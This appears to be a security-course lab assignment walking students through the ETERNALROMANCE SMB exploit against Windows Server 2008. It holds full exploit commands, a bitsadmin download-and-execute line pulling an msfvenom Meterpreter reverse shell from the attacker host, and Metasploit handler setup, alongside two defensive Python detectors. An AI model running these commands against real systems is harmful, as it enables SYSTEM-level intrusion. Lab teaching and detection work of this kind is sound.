Proj 15x: ETERNALROMANCE v. Windows Server 2008 (15 pts. extra credit)

What You Need for this Project

Purpose

To practice the ETERNALROMANCE attack. This awesome attack gives you SYSTEM on almost any Windows machine without the need for social engineering.

Preparing your Windows Target

Start the Windows target.

Click Start and type SHARING

Open "Network and Sharing Center"

Turn on these options, as shown below:

Click both Apply buttons, as shown below.

Open an Administrator Command Prompt and execute this command to enable the Guest account:

net user guest /active:yes

The command succeeds, as shown below.

Finding the Target IP Address

On the Windows target, open a Command Prompt window and execute the IPCONFIG command.

Note the target's IP address.

Enumerating Named Pipes

Named pipes are an inter-process communication mechanism used by Windows, and ETERNALROMANCE exploits them over SMB. So first, we need to find the named pipes available on the target.

On Kali, in a Terminal window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole
use auxiliary/scanner/smb/pipe_auditor
show info
set RHOSTS 172.16.1.191
exploit

A list of pipes appears, including netlogon, as shown below.
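From the defender's side, the pipe_auditor scan above leaves a distinctive trace: one client opening many different pipes on the IPC$ share in a few seconds. As an added example (not part of this project or of the exploit's code), the Python below runs that check over constructed Windows Security event 5145 records ("A network share object was checked to see whether client can be granted desired access"), which carry the client IP, the share name and the relative target name (the pipe, for IPC$). The record field names, the sample values and the five-pipes-in-ten-seconds threshold are assumptions for the example.

```python
"""Flag named-pipe enumeration against IPC$ in Windows Security event 5145 records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs). The field names are an assumption
# chosen to mirror the event's data: client IP, share name, relative target name.
SAMPLE_EVENTS = [
    # a scanner touching seven pipes in three seconds
    {"time": "2017-09-26T10:00:01", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "netlogon"},
    {"time": "2017-09-26T10:00:01", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "lsarpc"},
    {"time": "2017-09-26T10:00:02", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "samr"},
    {"time": "2017-09-26T10:00:02", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "browser"},
    {"time": "2017-09-26T10:00:03", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "atsvc"},
    {"time": "2017-09-26T10:00:03", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "epmapper"},
    {"time": "2017-09-26T10:00:04", "ip": "172.16.1.188", "share": r"\\*\IPC$", "target": "spoolss"},
    # an ordinary client: one pipe for a share listing, then a file on a data share
    {"time": "2017-09-26T10:01:10", "ip": "172.16.1.50", "share": r"\\*\IPC$", "target": "srvsvc"},
    {"time": "2017-09-26T10:01:11", "ip": "172.16.1.50", "share": r"\\*\Public", "target": r"reports\q3.xlsx"},
    # the same client touching a second pipe much later, well outside the window
    {"time": "2017-09-26T10:30:00", "ip": "172.16.1.50", "share": r"\\*\IPC$", "target": "spoolss"},
]


def detect_pipe_enumeration(events, threshold=5, window=timedelta(seconds=10)):
    """Return {client_ip: sorted pipe names} for every client that opened at least
    `threshold` distinct pipes on IPC$ within some span no longer than `window`."""
    probes = defaultdict(list)
    for ev in events:
        # only IPC$ accesses name a pipe; data-share accesses name files
        if ev["share"].upper().endswith("IPC$"):
            probes[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["target"].lower()))

    alerts = {}
    for ip, items in probes.items():
        items.sort()
        start = 0
        # sliding window over the client's time-ordered pipe opens
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {name for _, name in items[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = sorted({name for _, name in items})
                break
    return alerts


if __name__ == "__main__":
    for ip, pipes in detect_pipe_enumeration(SAMPLE_EVENTS).items():
        print(f"pipe enumeration from {ip}: {', '.join(pipes)}")
```

Event 5145 is only written when "Audit Detailed File Share" is enabled, so turn that subcategory on before relying on this; a domain member legitimately opens a handful of pipes (srvsvc, lsarpc, samr, netlogon) when it joins or authenticates, which is why the check counts distinct pipes in a short window rather than firing on any single one.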

Exploiting the Target with ETERNALROMANCE

On Kali, in a Terminal window, execute these commands to download the exploit (into a file named 42315), download a Python library it needs, and run it:

wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
python 42315

It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Kali, in a Terminal window, execute this command:

nano 42315

Scroll down a page to find the USERNAME line. Insert the username GUEST as shown below.

Press Ctrl+X, Y, Enter to save the file.

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python 42315 172.16.1.191 netlogon

The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To see if it worked, on the Windows target, click Start, Computer.

Open drive C:. The pwned file should be visible, as shown below.

Saving the Screen Image

Make sure you can see the pwned file, as shown above.

Save a FULL DESKTOP image with the filename Proj 15xa from Your Name.

Executing Arbitrary Commands

The exploit above was a simple proof-of-concept. Now we'll modify the exploit to run an arbitrary command.

It's good practice to keep any script that works and to copy it to a new file before making changes, so we'll do that.

On Kali, in a Terminal window, execute these commands to copy the exploit to a file named romance.py, and edit it with nano.

cp 42315 romance.py
nano romance.py

In nano, press Ctrl+W to search. Enter a search string of pwned as shown below.

Press Enter.

Nano finds the string. Notice the red line beginning with "#service_exec", highlighted in the image below.

Remove the # character at the start of that line, as shown below. This uncomments it, so the command line inside it will execute. This command line creates a file named "pwned_exec".

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target Again

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python romance.py 172.16.1.191 netlogon

The exploit runs as shown below, ending with a TIMEOUT error.

However, the exploit worked. To see that, on the Windows target, click Start, Computer.

Open drive C:. The pwned_exec file should be visible, as shown below.

Creating Meterpreter Malware

In Kali, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. The exe-service output format produces an executable designed to run as a Windows service.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). This shell will use the default port of 4444.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/html/shell-service.exe
service apache2 start

Start a Metasploit Handler

In Kali, open a new Terminal window and execute these commands to start a C&C listener.

msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit

The listener starts, as shown below.

Inserting the Command Lines

On Kali, in a Terminal window, execute this command to edit romance.py:

nano romance.py

In nano, press Ctrl+W to search. Enter a search string of pwned.

Press Enter.

Nano finds the string. As before, we will modify the line beginning with "service_exec", highlighted in the image below.

In that line, carefully delete the text between the single quotes, as shown below.

Insert this line between the single quotes, as shown below. Replace the IP address with the IP address of your Kali machine.

cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe &&  C:\shell-service.exe

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target a Third Time

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python romance.py 172.16.1.191 netlogon

The exploit runs as shown below.

The Meterpreter window shows a shell opening.

Execute these commands to interact with the shell and see who you are: you are SYSTEM, as shown below.

sessions -i 1
getuid
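The command line inserted into the service_exec line above, and the shell-service.exe it launches, are exactly the kind of activity a host-based detection should catch on the target: a shell started by the service control manager, bitsadmin pulling a file from a remote URL, a freshly downloaded executable run from the root of C:, all as SYSTEM. As an added example (not part of this project or of the exploit's code), the Python below applies those checks to constructed Sysmon-style process-creation records. The record layout, the sample paths and the rule wording are assumptions for the example; the command line in record 1 is the one this project inserts.

```python
"""Flag the process chain this lab produces on the target, from process-creation records."""
import re

# Constructed sample records (not real logs); the field names are an assumption
# mirroring Sysmon event 1: parent image, image, command line, user.
SAMPLE_PROCESSES = [
    # the service_exec command line from this project, started by the service control manager
    {"id": 1, "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe && C:\shell-service.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    # the download itself
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    # the downloaded service executable running from the drive root
    {"id": 3, "parent": r"C:\Windows\System32\services.exe", "image": r"C:\shell-service.exe",
     "cmdline": r"C:\shell-service.exe", "user": r"NT AUTHORITY\SYSTEM"},
    # ordinary activity that must not fire
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" notes.txt', "user": r"CORP\alice"},
    {"id": 5, "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs", "user": r"NT AUTHORITY\SYSTEM"},
]

# bitsadmin /transfer with an http(s) source URL anywhere in the command line
BITS_DOWNLOAD = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?\bhttps?://", re.IGNORECASE)
# an executable sitting directly in the root of a drive, e.g. C:\shell-service.exe
ROOT_EXECUTABLE = re.compile(r"^[A-Za-z]:\\[^\\]+\.exe$", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_reasons(rec):
    """Return the list of indicators matched by one record (empty if it looks benign)."""
    reasons = []
    parent, image = basename(rec["parent"]), basename(rec["image"])
    if parent == "services.exe" and image in SHELLS:
        reasons.append("shell launched directly by the service control manager")
    if BITS_DOWNLOAD.search(rec["cmdline"]):
        reasons.append("bitsadmin /transfer from a remote URL")
    if ROOT_EXECUTABLE.match(rec["image"]):
        reasons.append("executable run from the drive root")
    # privilege only matters once something else already looks wrong
    if reasons and rec["user"].upper().endswith("SYSTEM"):
        reasons.append("running as SYSTEM")
    return reasons


def scan(records):
    """Map record id -> matched indicators for every record with at least one hit."""
    hits = {}
    for rec in records:
        reasons = suspicious_reasons(rec)
        if reasons:
            hits[rec["id"]] = reasons
    return hits


if __name__ == "__main__":
    for rec_id, reasons in scan(SAMPLE_PROCESSES).items():
        print(f"record {rec_id}: " + "; ".join(reasons))
```

Each rule on its own will produce some noise on a real fleet (installers legitimately use BITS, and some services do spawn cmd.exe), which is why the function reports every matched indicator rather than a single verdict: the combination seen in record 1, a SYSTEM shell spawned by services.exe whose command line downloads and runs a file, is what warrants an immediate look.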

Saving the Screen Image

Make sure you can see the two required items shown above. Save a FULL DESKTOP image with the filename Proj 15xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124@gmail.com with a Subject line of Proj 15x from Your Name.

Posted 9-26-17 by Sam Bowne